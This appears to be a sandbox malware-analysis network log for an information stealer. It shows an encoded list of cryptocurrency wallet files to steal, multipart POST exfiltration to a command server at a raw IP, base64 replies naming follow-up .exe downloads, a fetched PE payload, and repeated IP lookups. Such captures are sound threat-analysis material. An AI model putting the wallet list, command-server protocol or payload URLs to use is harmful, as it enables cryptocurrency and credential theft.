Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Oct 2, 2024 09:42:31.842681885 CEST	464	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DAKEBAKFHCFHIEBFBAFB Host: 46.8.231.109 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 35 36 30 63 38 64 63 64 38 65 39 32 33 32 61 63 38 35 64 63 36 66 37 35 32 39 32 36 61 31 32 62 62 37 37 32 39 62 30 33 35 66 30 37 61 33 65 61 63 33 66 63 61 33 32 35 39 66 62 63 36 64 63 39 35 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 42 41 4b 46 48 43 46 48 49 45 42 46 42 41 46 42 2d 2d 0d 0a Data Ascii: ------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="token"3560c8dcd8e9232ac85dc6f752926a12bb7729b035f07a3eac3fca3259fbc6dc95d12a2b------DAKEBAKFHCFHIEBFBAFBContent-Disposition: form-data; name="message"files------DAKEBAKFHCFHIEBFBAFB--
Oct 2, 2024 09:42:32.021166086 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:31 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 2, 2024 09:42:32.030159950 CEST	562	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----BKKJKFBKKECFHJKEBKEH Host: 46.8.231.109 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 42 4b 4b 4a 4b 46 42 4b 4b 45 43 46 48 4a 4b 45 42 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 35 36 30 63 38 64 63 64 38 65 39 32 33 32 61 63 38 35 64 63 36 66 37 35 32 39 32 36 61 31 32 62 62 37 37 32 39 62 30 33 35 66 30 37 61 33 65 61 63 33 66 63 61 33 32 35 39 66 62 63 36 64 63 39 35 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4a 4b 46 42 4b 4b 45 43 46 48 4a 4b 45 42 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4b 4a 4b 46 42 4b 4b 45 43 46 48 4a 4b 45 42 4b 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------BKKJKFBKKECFHJKEBKEHContent-Disposition: form-data; name="token"3560c8dcd8e9232ac85dc6f752926a12bb7729b035f07a3eac3fca3259fbc6dc95d12a2b------BKKJKFBKKECFHJKEBKEHContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------BKKJKFBKKECFHJKEBKEHContent-Disposition: form-data; name="file"------BKKJKFBKKECFHJKEBKEH--
Oct 2, 2024 09:42:32.231992006 CEST	202	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 2, 2024 09:42:32.236356020 CEST	471	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAFIEBKKJJDAKFHIDBFH Host: 46.8.231.109 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 41 46 49 45 42 4b 4b 4a 4a 44 41 4b 46 48 49 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 35 36 30 63 38 64 63 64 38 65 39 32 33 32 61 63 38 35 64 63 36 66 37 35 32 39 32 36 61 31 32 62 62 37 37 32 39 62 30 33 35 66 30 37 61 33 65 61 63 33 66 63 61 33 32 35 39 66 62 63 36 64 63 39 35 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 49 45 42 4b 4b 4a 4a 44 41 4b 46 48 49 44 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 43 41 46 49 45 42 4b 4b 4a 4a 44 41 4b 46 48 49 44 42 46 48 2d 2d 0d 0a Data Ascii: ------CAFIEBKKJJDAKFHIDBFHContent-Disposition: form-data; name="token"3560c8dcd8e9232ac85dc6f752926a12bb7729b035f07a3eac3fca3259fbc6dc95d12a2b------CAFIEBKKJJDAKFHIDBFHContent-Disposition: form-data; name="message"ybncbhylepme------CAFIEBKKJJDAKFHIDBFH--
Oct 2, 2024 09:42:32.433324099 CEST	399	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:32 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 172 Keep-Alive: timeout=5, max=94 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 30 4e 79 34 30 4e 53 34 30 4e 43 34 78 4d 44 51 76 62 47 52 74 63 79 38 32 4e 6d 5a 69 5a 6d 4e 6a 5a 44 67 7a 4e 32 46 6a 58 33 5a 68 5a 47 64 6e 5a 48 4e 68 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 48 78 6f 64 48 52 77 4f 69 38 76 4d 54 51 33 4c 6a 51 31 4c 6a 51 30 4c 6a 45 77 4e 43 39 73 5a 47 31 7a 4c 7a 59 32 5a 6d 4a 6d 59 32 4d 35 4f 54 59 7a 59 32 46 66 62 47 52 6d 63 32 35 68 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 48 77 3d Data Ascii: aHR0cDovLzE0Ny40NS40NC4xMDQvbGRtcy82NmZiZmNjZDgzN2FjX3ZhZGdnZHNhLmV4ZXwwfDB8U3RhcnR8NHxodHRwOi8vMTQ3LjQ1LjQ0LjEwNC9sZG1zLzY2ZmJmY2M5OTYzY2FfbGRmc25hLmV4ZXwwfDB8U3RhcnR8NHw=
Oct 2, 2024 09:42:34.461014032 CEST	471	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IIIEBGCBGIDHDGCAKJEB Host: 46.8.231.109 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 49 49 45 42 47 43 42 47 49 44 48 44 47 43 41 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 35 36 30 63 38 64 63 64 38 65 39 32 33 32 61 63 38 35 64 63 36 66 37 35 32 39 32 36 61 31 32 62 62 37 37 32 39 62 30 33 35 66 30 37 61 33 65 61 63 33 66 63 61 33 32 35 39 66 62 63 36 64 63 39 35 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 42 47 43 42 47 49 44 48 44 47 43 41 4b 4a 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 49 49 49 45 42 47 43 42 47 49 44 48 44 47 43 41 4b 4a 45 42 2d 2d 0d 0a Data Ascii: ------IIIEBGCBGIDHDGCAKJEBContent-Disposition: form-data; name="token"3560c8dcd8e9232ac85dc6f752926a12bb7729b035f07a3eac3fca3259fbc6dc95d12a2b------IIIEBGCBGIDHDGCAKJEBContent-Disposition: form-data; name="message"wkkjqaiaxkhb------IIIEBGCBGIDHDGCAKJEB--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49824	147.45.44.104	80	6212	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 2, 2024 09:42:32.621773958 CEST	93	OUT	GET /ldms/66fbfcc9963ca_ldfsna.exe HTTP/1.1 Host: 147.45.44.104 Cache-Control: no-cache
Oct 2, 2024 09:42:33.240168095 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:42:33 GMT Content-Type: application/octet-stream Content-Length: 391072 Last-Modified: Tue, 01 Oct 2024 13:44:41 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66fbfcc9-5f7a0" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 20 f8 fb 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 a0 05 00 00 06 00 00 00 00 00 00 ee be 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 a2 22 06 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 be 05 00 53 00 00 00 00 c0 05 00 42 02 00 00 00 00 00 00 00 00 00 00 78 d1 05 00 28 26 00 00 00 e0 05 00 0c 00 00 00 60 bd 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL f @ "`SBx(&` H.text `.rsrcB@@.reloc@BH@ [(<sTw/x~ITT5Q>zbS/2Ew>/dt_so>UVSa5JKYw.#s"-d-7avn\].Lt:2o1!q9_OK^")0.3$5,}3cxz2I}Ie$ .V OGUa$+%\B-U3nc,lffo` bO
Oct 2, 2024 09:42:33.240200996 CEST	224	IN	Data Raw: 16 63 32 13 dd d1 52 94 12 5d 30 6f 8c 66 c8 d4 eb ac d4 3c d5 39 1e 15 5e 6e 5c fb d2 d4 be ba 0a 5c d0 e3 32 ad 1a 0e 06 3d 1b 6e 6b ee d8 37 20 e6 2c 6f 92 38 ca ac 23 e8 62 f1 06 bc 2a 9e 54 a5 88 67 7d 71 42 b8 5b 00 ee 92 f0 da d3 1d de 7a Data Ascii: c2R]0of<9^n\\2=nk7 ,o8#bTg}qB[zl_63Bu!g<NS_V?i^</V-vG/=OtQpV_,&H"fQ~+pS0Pzm(=/}T$]
Oct 2, 2024 09:42:33.240236998 CEST	1236	IN	Data Raw: 0b 4c 17 ac 37 28 a6 8e 84 49 22 99 54 e8 cf 25 7b d0 08 e2 76 37 e3 b2 fc 3f cf 7d 76 d5 7b 33 28 b2 b2 fe c0 a9 f2 48 69 50 7c c4 b4 e3 ba 74 d9 b1 37 61 8e 8d d3 76 2e 0d 98 3e 2d b3 0c 31 39 02 32 6f cc 9a bc 79 57 b8 f2 6a 28 4e 9c 8e df 86 Data Ascii: L7(I"T%{v7?}v{3(HiP\|t7av.>-192oyWj(NpP/g4s?lfgyl5wg.L+qY/lD:!ohx19dKN_"aZMn:_}pE24D75$J ]1"[]2/YJ+_&Fg0
Oct 2, 2024 09:42:33.240272045 CEST	1236	IN	Data Raw: 28 f9 78 ec 3d b4 38 89 d2 1c 14 0a d6 5b a8 72 30 a9 11 72 c3 0e 98 eb 71 fe 3f b8 9f 7f 16 66 c0 96 12 a1 38 f1 28 dd 2d 19 f7 e3 19 f0 11 f2 d4 4c c0 0b 22 92 58 72 75 b5 57 63 30 57 9b 60 da bd 1a e6 f0 98 fe 56 15 79 fc 0c 9b 58 78 04 ae cb Data Ascii: (x=8[r0rq?f8(-L"XruWc0W`VyXx/1\|W3tdFSM9Hl@#x?R\|5W5;E8{eo7<yHDt<q$@xfDFC+\|Ev+E-HOT+v`Sz7[oZ:po!
Oct 2, 2024 09:42:33.240309000 CEST	1236	IN	Data Raw: 13 76 44 dc 11 1a e6 39 b7 26 a6 9f 7d 75 da ef 47 f4 dc 1d a2 dd 65 94 3c 0f b8 6a 1d 86 d2 7c 5d a6 4a c0 47 92 a3 4f 0a 42 9f 94 33 1b e3 62 3a 90 79 55 dc 61 03 00 d2 c9 a7 71 1a 94 ff 08 5c d8 be 64 0a e4 99 47 b2 26 4f c7 ce 4f 0d df d1 0f Data Ascii: vD9&}uGe<j\|]JGOB3b:yUaq\dG&OO{\|=`:OHvbB\|&y]SCQ>0'K#xJ,dS-sI!?B<`=+[s@eW7/I3<UnJ(<bs3.6aI9%N,Cm
Oct 2, 2024 09:42:33.240343094 CEST	1236	IN	Data Raw: 35 cc 2a 5d bd e7 3e ab d7 9b 67 7a 3c 30 f5 13 ad 15 9e b1 31 59 6d 19 ff f6 dd a5 69 c8 f8 6a b5 c6 eb 79 43 3b 9a 2e 82 27 4b 5b 11 0e 29 ba 47 d4 8a 4d d2 09 c3 13 68 a9 69 20 54 a7 8b e6 6c c3 20 3c 46 39 5a 84 c0 77 1c 7f dc b5 e7 ff f9 fd Data Ascii: 5*]>gz<01YmijyC;.'K[)GMhi Tl <F9Zw1+u3#j4Vd+rH=b\|?\K7?>jTS_LzM\VAz2WI8:klnqVC=L}R5?La$
Oct 2, 2024 09:42:33.240380049 CEST	1236	IN	Data Raw: 86 5b ac 1b 58 a1 ec 1a 3c f9 f9 64 38 78 1a 43 18 c0 71 15 af e2 61 84 4c 4f 4e be 3c f6 0b 2b 27 5b 46 63 e6 98 b9 73 1a 1a f1 e2 3d 60 d2 a2 26 6e 49 b6 38 92 b4 ab c3 28 20 dd dd 13 ff c8 af 6f 1e 17 3f 56 74 59 51 ea b4 ce 69 50 b4 2b 5e 2e Data Ascii: [X<d8xCqaLON<+'[Fcs=`&nI8( o?VtYQiP+^.0 1_f(WgGx:u8}WRz5xZ\|B`X8DFi1c[rWV@>9bJh[V*.T%0R_p7]l4FFv[VBQ
Oct 2, 2024 09:42:33.240489960 CEST	1236	IN	Data Raw: ab 93 0a a0 95 fe e2 a4 78 91 28 31 24 75 ea 5c 76 ba 3f 79 d1 c7 ff 4e 38 da 2f bb 6a 23 a7 e4 85 54 58 59 f8 b0 95 d3 84 ad d3 d9 b9 21 19 cb 1d f3 98 d0 29 3c 3d bb 97 0c 44 d8 f7 8a d7 36 ac ea fc d4 95 ef 67 2f 47 ca a1 ab 60 a6 bb 14 9c 6d Data Ascii: x(1$u\v?yN8/j#TXY!)<=D6g/G`m9&}a+:[v$JRX\PJ2e]W-DkQ-}iDkq*8]RzjR$(ZUFU:PIdO)B@WP5E['PzK
Oct 2, 2024 09:42:33.240523100 CEST	1236	IN	Data Raw: 7a 9a 43 18 30 f9 54 6a 5f 58 e5 be d3 f4 2e fd 17 65 55 69 05 66 be af 33 26 e4 a5 55 46 8e b8 17 38 c6 b2 ff ad 14 8b 53 57 8e 3e e6 50 95 6b 1f eb 90 11 72 25 13 eb d3 a5 3d a0 23 01 7f ad bb 6c b4 a9 3f ee 0f ea 4a e3 c9 1a 9e 33 bb 62 3c ee Data Ascii: zC0Tj_X.eUif3&UF8SW>Pkr%=#l?J3b<DsHW,I\'}V*(a/d1d\|89}so$HiL0-LymB\|Irr&7xY3 u<7}#=6`$"7i~S
Oct 2, 2024 09:42:33.240560055 CEST	1236	IN	Data Raw: 40 23 fc bb 6a f9 f1 85 7b 51 38 aa d0 66 c0 9a f4 5a 25 8f 15 05 ae b1 8d c4 4c 34 73 48 27 1f f0 19 1c f3 f7 31 17 37 fd 46 0f 55 fd c1 9d c8 4f 2b 8a c1 ae 17 5d 75 ef 5d d2 67 9e ef c2 4a 2f 6c 64 77 57 bb 09 d5 f6 4b f1 e2 e4 6e 88 58 2e f2 Data Ascii: @#j{Q8fZ%L4sH'17FUO+]u]gJ/ldwWKnX.o/HM5{}{fYu&b;+W8ug$P?A0cOqf8mj~vu$N><j6~k=)>jm}F+"(9
Oct 2, 2024 09:42:33.245326996 CEST	1236	IN	Data Raw: 1b 05 d9 66 fa 20 c8 b0 02 bc eb 6e 79 9f 25 25 c6 2a 9a 28 93 e8 a3 a2 2f 83 9e 43 70 50 59 f0 d4 46 05 64 2c ed 9f f9 5a 9f 22 24 21 e6 75 23 00 0c 2c 67 9b 26 a1 fe d5 01 05 99 03 2b 1a c4 4a 40 1e bc 2b 19 51 8d 50 40 aa 22 8a 4c 91 16 d3 bf Data Ascii: f ny%%(/CpPYFd,Z"$!u#,g&+J@+QP@"L\|)CKq$INOL\|<g<!@&ZLW1=?.zpq_qQV8V"9\|;EZuop`Kh[vMgO\|rvz<Z5

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49835	172.67.74.152	80	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
Oct 2, 2024 09:42:43.890939951 CEST	63	OUT	GET / HTTP/1.1 Host: api.ipify.org Connection: Keep-Alive
Oct 2, 2024 09:42:44.405057907 CEST	227	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:44 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc30eb7393f431a-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33
Oct 2, 2024 09:42:45.552820921 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 2, 2024 09:42:45.681735992 CEST	227	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:45 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc30ebf3e33431a-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49847	172.67.74.152	80	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
Oct 2, 2024 09:42:54.561126947 CEST	63	OUT	GET / HTTP/1.1 Host: api.ipify.org Connection: Keep-Alive
Oct 2, 2024 09:42:55.049241066 CEST	227	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:55 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc30ef9a9d70f45-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49850	172.67.74.152	80	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
Oct 2, 2024 09:42:56.079092979 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 2, 2024 09:42:56.653965950 CEST	227	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:56 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc30f0359427295-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49860	104.26.13.205	80	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
Oct 2, 2024 09:43:08.505322933 CEST	63	OUT	GET / HTTP/1.1 Host: api.ipify.org Connection: Keep-Alive
Oct 2, 2024 09:43:08.961975098 CEST	227	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:43:08 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc30f50bb7e4381-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49863	104.26.13.205	80	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
Oct 2, 2024 09:43:10.072076082 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 2, 2024 09:43:10.529536963 CEST	227	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:43:10 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc30f5a798942fe-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33
Oct 2, 2024 09:43:10.743999004 CEST	227	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:43:10 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc30f5a798942fe-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49868	104.26.13.205	80	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
Oct 2, 2024 09:43:12.675760031 CEST	63	OUT	GET / HTTP/1.1 Host: api.ipify.org Connection: Keep-Alive
Oct 2, 2024 09:43:13.131711960 CEST	227	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:43:13 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc30f6acff143aa-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49871	104.26.13.205	80	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
Oct 2, 2024 09:43:14.073642015 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 2, 2024 09:43:14.538244009 CEST	227	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:43:14 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc30f738b8b4288-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33
Oct 2, 2024 09:43:14.751806974 CEST	227	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:43:14 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc30f738b8b4288-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49878	104.26.13.205	80	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
Oct 2, 2024 09:43:25.163002968 CEST	63	OUT	GET / HTTP/1.1 Host: api.ipify.org Connection: Keep-Alive
Oct 2, 2024 09:43:25.647542000 CEST	227	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:43:25 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc30fb8ee0843dd-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49880	104.26.13.205	80	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
Oct 2, 2024 09:43:26.567787886 CEST	39	OUT	GET / HTTP/1.1 Host: api.ipify.org
Oct 2, 2024 09:43:27.032150030 CEST	227	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:43:26 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc30fc19c0a19b2-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33
Oct 2, 2024 09:43:27.239753962 CEST	227	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:43:26 GMT Content-Type: text/plain Content-Length: 11 Connection: keep-alive Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 8cc30fc19c0a19b2-EWR Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: 8.46.123.33

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
